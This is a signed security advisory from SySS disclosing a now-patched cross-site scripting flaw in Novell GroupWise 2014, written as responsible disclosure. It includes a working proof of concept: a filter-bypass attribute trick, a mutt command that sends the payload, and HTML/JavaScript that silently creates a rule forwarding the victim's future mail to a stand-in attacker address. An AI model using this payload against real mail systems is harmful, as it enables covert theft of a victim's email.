-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2015-021 Product: GroupWise Vendor: Novell Affected Version(s): 2014 Tested Version(s): 2014 Vulnerability Type: Cross-Site Scripting (CWE-79) Risk Level: High Solution Status: Fixed Vendor Notification: 2015-05-04 Solution Date: 2015-07-06 Public Disclosure: 2015-07-16 CVE Reference: Not yet assigned Author of Advisory: Dr. Adrian Vollmer (SySS GmbH) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Novell GroupWise 2014 is an email web client which also features an address book, a calendar and a task management tool. The vendor Novell describes the product as follows (see [1]): "GroupWise 2014 gives employees robust email, calendaring, task management and contact management tools wherever they wander. The same goes for admins, who get streamlined, web-based administration and more to let them monitor, manage and make things happen on the go." ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: Novell GroupWise 2014 is vulnerable to Cross Site Scripting attacks. In combination, these vulnerabilities enable an attacker to perform various actions in the context of the victim's session. Sending a specially crafted email to the victim leads to JavaScript code being executed upon opening. This code can then send emails in the victim's name, create a rule to forward all future incoming emails to an email address chosen by the attacker, or possibly even forward existing emails in the victim's mailbox. In particular, the filter that is supposed to remove malicious code can be bypassed by appending an invalid attribute to the actual attribute of an HTML tag without using a separating space like this: <body o=''onload=alert('XSS')> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The following command sends an email to a victim that will, when opened, create a new rule to forward all future emails addressed to the victim to evil@attacker.invalid. mutt -e "set content_type=text/html" victim@xxxxxxxxxxxxxxxxxxxx -s "Re: Pentest" < payload.html The content of the file payload.html is: <html> <body o=''onload="document.getElementById('usercontext').setAttribute('value',window.location.pathname.split('/')[3]);var f=document.createElement('iframe');f.style='display:none';f.name='csrf-frame';document.body.appendChild(f);alert('Creating forwarding rule...');document.getElementById('Form').submit()"> Lorem ipsum dolor <form id="Form" action="https://vulnerable.groupwise-webapp.com/gw/webacc" method="POST" target="csrf-frame"> <input id="usercontext" type="hidden" name="User.context" value="" /> <input type="hidden" name="action" value="Rule.Create" /> <input type="hidden" name="Rule.type" value="Forward" /> <input type="hidden" name="Compose.id" value="" /> <input type="hidden" name="merge" value="ruleadd" /> <input type="hidden" name="error" value="ruleadd" /> <input type="hidden" name="Url.Rule.Action" value="1" /> <input type="hidden" name="Rule.name" value="newautomatedrule" /> <input type="hidden" name="RuleConditionfield" value="To" /> <input type="hidden" name="RuleConditioncondition" value="Contains" /> <input type="hidden" name="RuleConditiontext" value="Forward" /> <input type="hidden" name="Item.toName" value="evil@attacker.invalid" /> <input type="hidden" name="Item.to" value="evil@attacker.invalid" /> <input type="hidden" name="Item.ccName" value="" /> <input type="hidden" name="Item.cc" value="" /> <input type="hidden" name="Item.bcName" value="" /> <input type="hidden" name="Item.bc" value="" /> <input type="hidden" name="Item.subject" value="" /> <input type="hidden" name="Rule.subjectPrefix" value="Fwd:" /> <input type="hidden" name="Item.message" value="" /> <input type="hidden" name="Rule.Create" value="" /> </form> </body> </html> The number of the array element (here: 3) may be dependent on the particular installation and configuration of GroupWise. It refers to the part in the URL which represents the "User.context", a parameter resembling an anti-CSRF token which is transmitted as a GET parameter. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Apply the Support Pack 2 provided by Novell. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2015-04-28: Vulnerability discovered 2015-05-04: Vendor notified 2015-05-11: Vendor notified a second time 2015-05-12: Vendor acknowledged notification 2015-07-06: Vendor published patch 2015-07-16: Advisory published ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product Web Site for Novell GroupWise 2014 https://www.novell.com/products/groupwise/ [2] SySS Policy for Responsible Disclosure https://www.syss.de/en/news/responsible-disclosure-policy/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: Security vulnerability found by Dr. Adrian Vollmer of the SySS GmbH. E-Mail: adrian.vollmer@xxxxxxx Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Adrian_Vollmer.asc Key ID: 0x037C9FE7 Key Fingerprint: 70CF E88C AEE7 DB0F 5DC8 3403 0E02 7C7E 037C 9FE7 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIcBAEBCgAGBQJVqKdgAAoJEA4CfH4DfJ/nz5sP/2kQV0m7LEfHYR5i8W+zq2zW i5WnJCKzSRAeUH7T7zONeXWdC3qdkwXzUnLdLlncJNgnmaJy3i5m3x3+4ZySrREB nrrv1Cfl0U1rfhqpXiKjP+P8Tvr4kJB1qmd5VYpUPfrPcM4XtinGuuAKyOo99ewR yxnwHK2MqUDM9ZnP90hAkwoTCoBCk7iU64okSasfU/jwK3KKUXl/iNyjBiSGHt7r lYXTjvQsIWRrhSeJkGUCKmr29NeD3iqN/28gpMYUS7Ce7nRhwiKScipFkrcHLOW1 YDhAaivg0gYzTL2WFczxnQnFxyBvzqUIGSJvGOsdbDT3xcrYaqbEhC75CsuTQ0zS bVbcmgTNIRxqfTyCR4foXp8HJJVZVV3YFdirPuQXUZJ2VIlUA26pHneFoKQ4AjR1 hZiv3AF15oG6EYHaK9jnoMWirBQVg+p2pcB6ysuZMqB7PzE/xj+lDi+yoAg8wAcv TiQwL4z01RQ2755LYWNUwV95zwuJbR9oSrdM9GxV2damn3B2vbLAqAc3B91PjWiF x6YurkuS1K4cxDssWhUYsG8MnTk93J6WvmK5yq6Q8q3AyfNTborJHXPWhn5EiWaR Vs3jYBLK2w5RDaZkcmv8sboe5tP+PWue3ZkDk1YOv77WssR8H9Zw0QZhoVE86iEI 72qVznwtS+OrwnbJPGv/ =D9K4 -----END PGP SIGNATURE-----